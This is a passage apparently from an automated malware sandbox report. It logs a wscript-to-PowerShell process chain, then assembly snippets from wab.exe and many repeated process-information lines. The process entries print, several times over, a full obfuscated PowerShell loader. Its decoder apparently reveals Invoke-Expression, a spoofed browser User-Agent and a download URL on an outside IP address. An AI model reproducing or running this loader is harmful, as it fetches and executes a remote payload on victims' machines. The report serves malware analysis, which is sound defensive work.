Ove,tr.isbaadshHashpibholie orkL kishn ';$Furibund=Gunflints 'Enkelth>Se.opus ';$Cumulates=Gunflints ' SnitfliforladeeMarlinexOverp i ';$Vandrerkorts='Paatalernes';$Onklerne = Gunflints 'Undu eoeFeelingc Skyldnh,dlydskoWastefu Deflor%U.profiaOver,oppOvertrdp d onnidRigstrna GraasttBnketsia rkanst%Garant.\FrescoeFParaff eUngeniaj Ove bad CardioeIngen.odha,lssteGule.dd.PrstegaePlafo,dlShowboalAllinge Meazlef&Bundtet&Phi,ant Ynglerne ManslacLiglotth.heologoRaynard KrampetP.ragra ';Skildrerne (Gunflints ' Fredni$,ccumbmg AkropolMich.elo SkaanebSpisekraUdsivnilDi,xinr: HyssenKFiskeriuP.einstnUnburntd Dis ere.ntermatstamin.jFo tbrieAa.sindnlooeysueMonterisOver,eatRykindeeCetoniin bri.ebsC,shmer=Underbe(electroc runcatmVi.terhdSelvkla Rangkla/Inco.vecXylosma thainto$Korrig OSphac ln cum.lak.esparilUndercheDvlerehrKontraknPa,ralle.dmeasu)SnaJump to behavior
                Suspicious powershell command line found
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Racings Catharin Scampies Circumscribing133 Parolees Maksimumstraffe Nonimportation Paatalernes alfabetiseres Isoimmunizations Dyreryggens73 Silversmiths Suckfish45 Gormandising Synalephe Kldelig Intermediary Octogenarians Jammerklagerne Randrusianskes Statsborgerskabers Arnolds Optimist Aeronautic Racings Catharin Scampies Circumscribing133 Parolees Maksimumstraffe Nonimportation Paatalernes alfabetiseres Isoimmunizations Dyreryggens73 Silversmiths Suckfish45 Gormandising Synalephe Kldelig Intermediary Octogenarians Jammerklagerne Randrusianskes Statsborgerskabers Arnolds Optimist Aeronautic';If (${host}.CurrentCulture) {$Sinologi++;}Function Gunflints($Handsawfish){$Guvnor=$Handsawfish.Length-$Sinologi;$Beflounce96='SUBsTRI';$Beflounce96+='ng';For( $Fletteprocessers=7;$Fletteprocessers -lt $Guvnor;$Fletteprocessers+=8){$Racings+=$Handsawfish.$Beflounce96.Invoke( $Fletteprocessers, $Sinologi);}$Racings;}function Skildrerne($larrigan){ &($Cumulates) ($larrigan);}$Cryptoglaux=Gunflints 'SlvpapiM Rullego AulostzC,quinaiC acatel TeitmilForzanda Voldsh/unwilt 5Ost.nsi.Prmiere0Glazier Gennems( EmascuW SluppeiPylorosnPolyli d s,ifteoAnalysewConvolvs Intens DamerkkNfngsel.TBedaa e Ptisanr1 Tarrag0 Typif,.Dinguse0.ambesg;Laurent AimilepWSudansaiBestillnAdrenin6.eander4Latesce;Agerdyr A toplaxDiso de6Audi,iv4 Precon; Beregn TvrrebsrTromlervL ftreg: zilasm1Csarre.2 Opsaml1Rringer.Riv nca0Franker)Tilfres systempGUdskregeBawbeescAddendek igua,ooSemenan/ Econo.2Libe ta0 Shaved1Harvard0Bitmnst0Standar1 Trerum0Presump1Subinte By,selvF S,igeriUnrooflrM.nostie Disoccf bservaoFug,ighxTriglyp/Halvoff1Kultu,m2Aut,mob1Klinikk.Haa dva0Triadic ';$spliff=Gunflints 'Bela neUP,oletasKtast.seRejekllrudskyde-GenopleADyffeleg OversteAfskninnEarfulstOmbreaf ';$Parolees=Gunflints 'UdpegelhBlgeb vt Beregnt SyphonpUrfjeld:nicadss/Alufo,i/svingsa1Glycero0 str.tc3Dep,tat.Vavasor2D.alate3Te,rsta7Annegit.Torkild8Doekspr6Svovlha.Fro.tlu2Strutma4Tegneku7Emb,yol/ApplikaUCorticid RejsegmGemotsma Di,selg orskefrIn.ighteResurget Ove,tr.isbaadshHashpibholie orkL kishn ';$Furibund=Gunflints 'Enkelth>Se.opus ';$Cumulates=Gunflints ' SnitfliforladeeMarlinexOverp i ';$Vandrerkorts='Paatalernes';$Onklerne = Gunflints 'Undu eoeFeelingc Skyldnh,dlydskoWastefu Deflor%U.profiaOver,oppOvertrdp d onnidRigstrna GraasttBnketsia rkanst%Garant.\FrescoeFParaff eUngeniaj Ove bad CardioeIngen.odha,lssteGule.dd.PrstegaePlafo,dlShowboalAllinge Meazlef&Bundtet&Phi,ant Ynglerne ManslacLiglotth.heologoRaynard KrampetP.ragra ';Skildrerne (Gunflints ' Fredni$,ccumbmg AkropolMich.elo SkaanebSpisekraUdsivnilDi,xinr: HyssenKFiskeriuP.einstnUnburntd Dis ere.ntermatstamin.jFo tbrieAa.sindnlooeysueMonterisOver,eatRykindeeCetoniin bri.ebsC,shmer=Underbe(electroc runcatmVi.terhdSelvkla Rangkla/Inco.vecXylosma thainto$Korrig OSphac ln cum.lak.esparilUndercheDvlerehrKontraknPa,ralle.dmeasu)Sna
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Racings Catharin Scampies Circumscribing133 Parolees Maksimumstraffe Nonimportation Paatalernes alfabetiseres Isoimmunizations Dyreryggens73 Silversmiths Suckfish45 Gormandising Synalephe Kldelig Intermediary Octogenarians Jammerklagerne Randrusianskes Statsborgerskabers Arnolds Optimist Aeronautic Racings Catharin Scampies Circumscribing133 Parolees Maksimumstraffe Nonimportation Paatalernes alfabetiseres Isoimmunizations Dyreryggens73 Silversmiths Suckfish45 Gormandising Synalephe Kldelig Intermediary Octogenarians Jammerklagerne Randrusianskes Statsborgerskabers Arnolds Optimist Aeronautic';If (${host}.CurrentCulture) {$Sinologi++;}Function Gunflints($Handsawfish){$Guvnor=$Handsawfish.Length-$Sinologi;$Beflounce96='SUBsTRI';$Beflounce96+='ng';For( $Fletteprocessers=7;$Fletteprocessers -lt $Guvnor;$Fletteprocessers+=8){$Racings+=$Handsawfish.$Beflounce96.Invoke( $Fletteprocessers, $Sinologi);}$Racings;}function Skildrerne($larrigan){ &($Cumulates) ($larrigan);}$Cryptoglaux=Gunflints 'SlvpapiM Rullego AulostzC,quinaiC acatel TeitmilForzanda Voldsh/unwilt 5Ost.nsi.Prmiere0Glazier Gennems( EmascuW SluppeiPylorosnPolyli d s,ifteoAnalysewConvolvs Intens DamerkkNfngsel.TBedaa e Ptisanr1 Tarrag0 Typif,.Dinguse0.ambesg;Laurent AimilepWSudansaiBestillnAdrenin6.eander4Latesce;Agerdyr A toplaxDiso de6Audi,iv4 Precon; Beregn TvrrebsrTromlervL ftreg: zilasm1Csarre.2 Opsaml1Rringer.Riv nca0Franker)Tilfres systempGUdskregeBawbeescAddendek igua,ooSemenan/ Econo.2Libe ta0 Shaved1Harvard0Bitmnst0Standar1 Trerum0Presump1Subinte By,selvF S,igeriUnrooflrM.nostie Disoccf bservaoFug,ighxTriglyp/Halvoff1Kultu,m2Aut,mob1Klinikk.Haa dva0Triadic ';$spliff=Gunflints 'Bela neUP,oletasKtast.seRejekllrudskyde-GenopleADyffeleg OversteAfskninnEarfulstOmbreaf ';$Parolees=Gunflints 'UdpegelhBlgeb vt Beregnt SyphonpUrfjeld:nicadss/Alufo,i/svingsa1Glycero0 str.tc3Dep,tat.Vavasor2D.alate3Te,rsta7Annegit.Torkild8Doekspr6Svovlha.Fro.tlu2Strutma4Tegneku7Emb,yol/ApplikaUCorticid RejsegmGemotsma Di,selg orskefrIn.ighteResurget Ove,tr.isbaadshHashpibholie orkL kishn ';$Furibund=Gunflints 'Enkelth>Se.opus ';$Cumulates=Gunflints ' SnitfliforladeeMarlinexOverp i ';$Vandrerkorts='Paatalernes';$Onklerne = Gunflints 'Undu eoeFeelingc Skyldnh,dlydskoWastefu Deflor%U.profiaOver,oppOvertrdp d onnidRigstrna GraasttBnketsia rkanst%Garant.\FrescoeFParaff eUngeniaj Ove bad CardioeIngen.odha,lssteGule.dd.PrstegaePlafo,dlShowboalAllinge Meazlef&Bundtet&Phi,ant Ynglerne ManslacLiglotth.heologoRaynard KrampetP.ragra ';Skildrerne (Gunflints ' Fredni$,ccumbmg AkropolMich.elo SkaanebSpisekraUdsivnilDi,xinr: HyssenKFiskeriuP.einstnUnburntd Dis ere.ntermatstamin.jFo tbrieAa.sindnlooeysueMonterisOver,eatRykindeeCetoniin bri.ebsC,shmer=Underbe(electroc runcatmVi.terhdSelvkla Rangkla/Inco.vecXylosma thainto$Korrig OSphac ln cum.lak.esparilUndercheDvlerehrKontraknPa,ralle.dmeasu)Sna
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Racings Catharin Scampies Circumscribing133 Parolees Maksimumstraffe Nonimportation Paatalernes alfabetiseres Isoimmunizations Dyreryggens73 Silversmiths Suckfish45 Gormandising Synalephe Kldelig Intermediary Octogenarians Jammerklagerne Randrusianskes Statsborgerskabers Arnolds Optimist Aeronautic Racings Catharin Scampies Circumscribing133 Parolees Maksimumstraffe Nonimportation Paatalernes alfabetiseres Isoimmunizations Dyreryggens73 Silversmiths Suckfish45 Gormandising Synalephe Kldelig Intermediary Octogenarians Jammerklagerne Randrusianskes Statsborgerskabers Arnolds Optimist Aeronautic';If (${host}.CurrentCulture) {$Sinologi++;}Function Gunflints($Handsawfish){$Guvnor=$Handsawfish.Length-$Sinologi;$Beflounce96='SUBsTRI';$Beflounce96+='ng';For( $Fletteprocessers=7;$Fletteprocessers -lt $Guvnor;$Fletteprocessers+=8){$Racings+=$Handsawfish.$Beflounce96.Invoke( $Fletteprocessers, $Sinologi);}$Racings;}function Skildrerne($larrigan){ &($Cumulates) ($larrigan);}$Cryptoglaux=Gunflints 'SlvpapiM Rullego AulostzC,quinaiC acatel TeitmilForzanda Voldsh/unwilt 5Ost.nsi.Prmiere0Glazier Gennems( EmascuW SluppeiPylorosnPolyli d s,ifteoAnalysewConvolvs Intens DamerkkNfngsel.TBedaa e Ptisanr1 Tarrag0 Typif,.Dinguse0.ambesg;Laurent AimilepWSudansaiBestillnAdrenin6.eander4Latesce;Agerdyr A toplaxDiso de6Audi,iv4 Precon; Beregn TvrrebsrTromlervL ftreg: zilasm1Csarre.2 Opsaml1Rringer.Riv nca0Franker)Tilfres systempGUdskregeBawbeescAddendek igua,ooSemenan/ Econo.2Libe ta0 Shaved1Harvard0Bitmnst0Standar1 Trerum0Presump1Subinte By,selvF S,igeriUnrooflrM.nostie Disoccf bservaoFug,ighxTriglyp/Halvoff1Kultu,m2Aut,mob1Klinikk.Haa dva0Triadic ';$spliff=Gunflints 'Bela neUP,oletasKtast.seRejekllrudskyde-GenopleADyffeleg OversteAfskninnEarfulstOmbreaf ';$Parolees=Gunflints 'UdpegelhBlgeb vt Beregnt SyphonpUrfjeld:nicadss/Alufo,i/svingsa1Glycero0 str.tc3Dep,tat.Vavasor2D.alate3Te,rsta7Annegit.Torkild8Doekspr6Svovlha.Fro.tlu2Strutma4Tegneku7Emb,yol/ApplikaUCorticid RejsegmGemotsma Di,selg orskefrIn.ighteResurget Ove,tr.isbaadshHashpibholie orkL kishn ';$Furibund=Gunflints 'Enkelth>Se.opus ';$Cumulates=Gunflints ' SnitfliforladeeMarlinexOverp i ';$Vandrerkorts='Paatalernes';$Onklerne = Gunflints 'Undu eoeFeelingc Skyldnh,dlydskoWastefu Deflor%U.profiaOver,oppOvertrdp d onnidRigstrna GraasttBnketsia rkanst%Garant.\FrescoeFParaff eUngeniaj Ove bad CardioeIngen.odha,lssteGule.dd.PrstegaePlafo,dlShowboalAllinge Meazlef&Bundtet&Phi,ant Ynglerne ManslacLiglotth.heologoRaynard KrampetP.ragra ';Skildrerne (Gunflints ' Fredni$,ccumbmg AkropolMich.elo SkaanebSpisekraUdsivnilDi,xinr: HyssenKFiskeriuP.einstnUnburntd Dis ere.ntermatstamin.jFo tbrieAa.sindnlooeysueMonterisOver,eatRykindeeCetoniin bri.ebsC,shmer=Underbe(electroc runcatmVi.terhdSelvkla Rangkla/Inco.vecXylosma thainto$Korrig OSphac ln cum.lak.esparilUndercheDvlerehrKontraknPa,ralle.dmeasu)SnaJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Racings Catharin Scampies Circumscribing133 Parolees Maksimumstraffe Nonimportation Paatalernes alfabetiseres Isoimmunizations Dyreryggens73 Silversmiths Suckfish45 Gormandising Synalephe Kldelig Intermediary Octogenarians Jammerklagerne Randrusianskes Statsborgerskabers Arnolds Optimist Aeronautic Racings Catharin Scampies Circumscribing133 Parolees Maksimumstraffe Nonimportation Paatalernes alfabetiseres Isoimmunizations Dyreryggens73 Silversmiths Suckfish45 Gormandising Synalephe Kldelig Intermediary Octogenarians Jammerklagerne Randrusianskes Statsborgerskabers Arnolds Optimist Aeronautic';If (${host}.CurrentCulture) {$Sinologi++;}Function Gunflints($Handsawfish){$Guvnor=$Handsawfish.Length-$Sinologi;$Beflounce96='SUBsTRI';$Beflounce96+='ng';For( $Fletteprocessers=7;$Fletteprocessers -lt $Guvnor;$Fletteprocessers+=8){$Racings+=$Handsawfish.$Beflounce96.Invoke( $Fletteprocessers, $Sinologi);}$Racings;}function Skildrerne($larrigan){ &($Cumulates) ($larrigan);}$Cryptoglaux=Gunflints 'SlvpapiM Rullego AulostzC,quinaiC acatel TeitmilForzanda Voldsh/unwilt 5Ost.nsi.Prmiere0Glazier Gennems( EmascuW SluppeiPylorosnPolyli d s,ifteoAnalysewConvolvs Intens DamerkkNfngsel.TBedaa e Ptisanr1 Tarrag0 Typif,.Dinguse0.ambesg;Laurent AimilepWSudansaiBestillnAdrenin6.eander4Latesce;Agerdyr A toplaxDiso de6Audi,iv4 Precon; Beregn TvrrebsrTromlervL ftreg: zilasm1Csarre.2 Opsaml1Rringer.Riv nca0Franker)Tilfres systempGUdskregeBawbeescAddendek igua,ooSemenan/ Econo.2Libe ta0 Shaved1Harvard0Bitmnst0Standar1 Trerum0Presump1Subinte By,selvF S,igeriUnrooflrM.nostie Disoccf bservaoFug,ighxTriglyp/Halvoff1Kultu,m2Aut,mob1Klinikk.Haa dva0Triadic ';$spliff=Gunflints 'Bela neUP,oletasKtast.seRejekllrudskyde-GenopleADyffeleg OversteAfskninnEarfulstOmbreaf ';$Parolees=Gunflints 'UdpegelhBlgeb vt Beregnt SyphonpUrfjeld:nicadss/Alufo,i/svingsa1Glycero0 str.tc3Dep,tat.Vavasor2D.alate3Te,rsta7Annegit.Torkild8Doekspr6Svovlha.Fro.tlu2Strutma4Tegneku7Emb,yol/ApplikaUCorticid RejsegmGemotsma Di,selg orskefrIn.ighteResurget Ove,tr.isbaadshHashpibholie orkL kishn ';$Furibund=Gunflints 'Enkelth>Se.opus ';$Cumulates=Gunflints ' SnitfliforladeeMarlinexOverp i ';$Vandrerkorts='Paatalernes';$Onklerne = Gunflints 'Undu eoeFeelingc Skyldnh,dlydskoWastefu Deflor%U.profiaOver,oppOvertrdp d onnidRigstrna GraasttBnketsia rkanst%Garant.\FrescoeFParaff eUngeniaj Ove bad CardioeIngen.odha,lssteGule.dd.PrstegaePlafo,dlShowboalAllinge Meazlef&Bundtet&Phi,ant Ynglerne ManslacLiglotth.heologoRaynard KrampetP.ragra ';Skildrerne (Gunflints ' Fredni$,ccumbmg AkropolMich.elo SkaanebSpisekraUdsivnilDi,xinr: HyssenKFiskeriuP.einstnUnburntd Dis ere.ntermatstamin.jFo tbrieAa.sindnlooeysueMonterisOver,eatRykindeeCetoniin bri.ebsC,shmer=Underbe(electroc runcatmVi.terhdSelvkla Rangkla/Inco.vecXylosma thainto$Korrig OSphac ln cum.lak.esparilUndercheDvlerehrKontraknPa,ralle.dmeasu)SnaJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW,10_2_004044A4
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B955479 push ebp; iretd 1_2_00007FFD9B955538
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_02A5EC78 pushfd ; retf 4_2_02A5EC79
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06E40000 push es; retf 4_2_06E40014
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06E481A1 push esi; retf 4_2_06E481A2
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06E41D28 push eax; mov dword ptr [esp], ecx4_2_06E421B4
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_08A05E8C push ebp; retf 4_2_08A05E98
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_08A02030 push FFFFFFABh; iretd 4_2_08A02044
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_08A00D1E push cs; ret 4_2_08A00D21
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_08A05F4B push ss; retf 4_2_08A05F5B
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_08A01B52 push esi; iretd 4_2_08A01B53
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_08A06D58 push ebx; iretd 4_2_08A06D59
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_22792806 push ecx; ret 9_2_22792819
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_04462030 push FFFFFFABh; iretd 9_2_04462044
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_04466D58 push ebx; iretd 9_2_04466D59
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_04460D1E push cs; ret 9_2_04460D21
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_04465E8C push ebp; retf 9_2_04465E98
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_04465F4B push ss; retf 9_2_04465F5B
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_04461B52 push esi; iretd 9_2_04461B53
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_0044693D push ecx; ret 10_2_0044694D
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_0044DB70 push eax; ret 10_2_0044DB84
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_0044DB70 push eax; ret 10_2_0044DBAC
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_00451D54 push eax; ret 10_2_00451D61
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_0044B090 push eax; ret 11_2_0044B0A4
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_0044B090 push eax; ret 11_2_0044B0CC
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_00444E71 push ecx; ret 11_2_00444E81
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_00414060 push eax; ret 12_2_00414074
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_00414060 push eax; ret 12_2_0041409C
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_00414039 push ecx; ret 12_2_00414049
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_004164EB push 0000006Ah; retf 12_2_004165C4
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_00416553 push 0000006Ah; retf 12_2_004165C4
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_00416555 push 0000006Ah; retf 12_2_004165C4
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_004047CB LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,11_2_004047CB
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
